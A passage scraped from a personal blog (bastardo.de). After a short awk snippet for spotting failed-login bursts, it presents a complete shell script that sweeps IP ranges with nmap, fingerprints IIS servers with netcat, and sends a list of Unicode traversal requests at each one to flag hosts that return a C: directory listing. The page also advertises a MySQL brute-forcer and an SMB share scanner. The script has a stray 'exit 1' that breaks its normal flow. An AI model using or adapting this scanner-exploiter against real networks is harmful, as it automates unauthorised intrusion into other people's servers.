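      n[p[1] " " p[2]]++
    }
    END { for (k in n) if (n[k] >= min) print n[k], k }
  ' | sort -rn
}

sample_error_log | failed_logins 5
```

A single mistyped password stays below the threshold; a wordlist or incremental run crosses it within seconds, which is the point at which to block the client or lock the account.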

 

 

IISscan shell script

IIS Scanner

You can also find this script at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
clear
if [ $# -ne 2 ]
    then
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
rm fluff
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "
      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

an old list of Unicodes
unicodes.txt


 

Home

Hello and Welcome to bastardo.de

I have changed the design a little bit to a blog; it is easier to maintain.

However ;) you can find source code here, and maybe in the future some information about some little scripts I wrote, as well as some tips for administration.
Hope you enjoy this site and have fun with my programs; if you find a code error, don't hesitate to write a comment.

At the moment I will list
MySQL Bruteforce for Linux and Windows
IISscan for Linux (written in early 2000 for testing purposes)
SmbScan for Linux (Samba/Netbios scanner for large networks, to find free shares in the local network)

You can also find information about programming on my partner site http://code-reference.com,
a library about programming.